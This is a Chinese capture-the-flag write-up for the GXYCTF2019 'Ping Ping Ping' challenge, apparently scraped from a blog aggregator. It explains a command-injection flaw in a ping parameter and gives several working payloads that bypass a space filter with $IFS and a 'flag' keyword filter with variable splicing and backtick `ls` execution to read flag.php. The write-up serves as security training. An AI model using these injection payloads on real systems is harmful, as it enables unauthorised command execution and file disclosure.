当前位置: 首页 > news >正文

[GXYCTF2019]Ping Ping Ping wp - fish666

[GXYCTF2019]Ping Ping Ping wp

命令注入漏洞

空格绕过

内联命令读取

image-20251111150335092

image-20251111150409210

存在命令注入漏洞

“fxck” 是脏话 “fuck” 的刻意拼写变形,攻击性极强

image-20251111145331968

这个表明,空格被过滤。

那么就要想,怎样绕过???

空格 可以用

   空格${IFS}${IFS}$9$IFS$1    绕过    可以逐个试试哪个管用

image-20251111150052270

现在表明flag也被过滤了

但,刚刚出现,产生flag.php index.php 可以都试一下

image-20251111150238952

发现很多符号都被绕过了

   preg_match("/.*f.*l.*a.*g.*/", $ip)意思是:如果$ip中包含f、l、a、g这四个字母(不管顺序和中间插什么字符),就输出 fxck your flag! 并终止程序。

这个表明,我们不能直接输入flag进行文件读取,但可以使用变量赋值的方式

  ?ip=127.0.0.1;X=g;cat$IFS$1fla$X.php

查看页面源代码

image-20251111151402026

  以下payload也可行:?ip=127.0.0.1;X=ag;cat$IFS$9fl$X.php?ip=127.0.0.1;X=lag;cat$IFS$9f$X.php?ip=127.0.0.1;X=la;cat$IFS$9`ls`        //内联执行配合空格绕过但以下payload不可行:?ip=127.0.0.1;X=a;cat$IFS$9fl$Xg.php?ip=127.0.0.1;X=la;cat$IFS$9f$Xg.php因为shell会把$Xg当成一个变量名进行解析,但是该变量并没有定义。而前面可行的payload中因为变量$X后紧接着是.,因此可以成功解析

反引号 ls 是内联命令,会先执行 ls 并将结果作为参数传给 cat,最终效果是 “读取 ls 命令列出的文件内容”。

   `ls`
   ?ip=127.0.0.1;cat$IFS`ls`

查看页面源代码 获取源代码

http://www.jsqmd.com/news/37633/

相关文章:

  • 2025 年 11 月码垛机厂家推荐排行榜,全自动/高位/低位/立柱/编织袋/纸箱/桶/粉料/肥料码垛机,江苏/无锡码垛机器人实力解析
  • 2025年西瓜专用膜厂家权威推荐榜单:水果专用膜/长寿流滴膜/灌浆膜源头厂家精选
  • 2025 年 11 月包装称厂家权威推荐榜:全自动/定量/FFS重膜/高速/锂电/零排放/螺旋/吨袋包装称,铜精粉与肥料吨包高效解决方案
  • 基于MATLAB图像特征识别及提取实现图像分类
  • Strix:用AI做渗透测试,把安全漏洞扼杀在开发阶段
  • 无限长直导线周围电场分布的MATLAB
  • Codeforces Round 1063 (Div.2) 题解
  • SI502、SI502B——NFC前端芯片
  • 草稿5
  • 1-2-3-泛型与反射
  • 读书笔记:白话解读:Oracle并行加载与空间管理的艺术
  • 1-2-4-集合框架
  • 1-3-1-知识图谱
  • USB --- PD协商
  • T690363 促销活动
  • 1-3-2-线程生命周期与状态转换
  • 1-2-2-异常体系
  • 1-5-1-设计模式与OOP
  • 1-6-0-总纲
  • 1-6-2-网络协议基础
  • 1-3-5-AQS详解
  • 起飞啦,太easy啦!!!小白的神级AI辅助工具,一句话即可搭建超50个节点的工作流~~~~
  • 3-1-1-2-MySQL锁机制
  • Debug日志
  • 3-1-1-4-ACID特性底层原理
  • 1-6-5-Netty
  • 2025年11月北京离婚房产律师对比榜:五强机构多维评测
  • 3-1-2-1-MySQL整体架构详解
  • 3-1-2-2-MySQL分页查询机制
  • 3-1-2-3-MySQL高可用与容灾